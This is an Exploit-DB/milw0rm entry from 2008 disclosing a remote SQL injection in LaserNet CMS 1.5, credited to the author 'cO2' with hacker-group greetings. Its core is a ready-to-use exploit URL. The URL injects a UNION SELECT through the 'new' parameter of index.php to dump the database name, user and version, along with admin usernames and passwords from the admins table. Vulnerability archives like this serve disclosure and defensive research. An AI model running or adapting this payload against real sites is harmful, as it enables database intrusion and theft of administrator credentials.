LaserNet CMS 1.5 - SQL Injection

EDB-ID:

5454

Author:

cO2

Type:

webapps

Platform:

PHP

Published:

2008-04-15

###################################################
[~] Lasernet CMS v1.5 Remote Sql Ä°nj. Vuln.
                                                                                                               
[~] Founder: cO2 [ Algeria Security Crew ]
[~] HomePage: http://www.DZ-Secure.com
[~] Greatz : To all Hackerz from Algeria & All My Friends . . .
[~] Contact: c02@Hotmail.de
[~] Exploit :
http://www.xxx.org//index.php?id=new&new=-1'%20UNION%20ALL%20SELECT%201,2,concat(database(),char(58),user(),char(58),version()),concat(username,0x3e,password),5,6,7,8,9+from+admins/*
---------------------
http://www.DZ-Secure.com
---------------------
###############################################

# milw0rm.com [2008-04-15]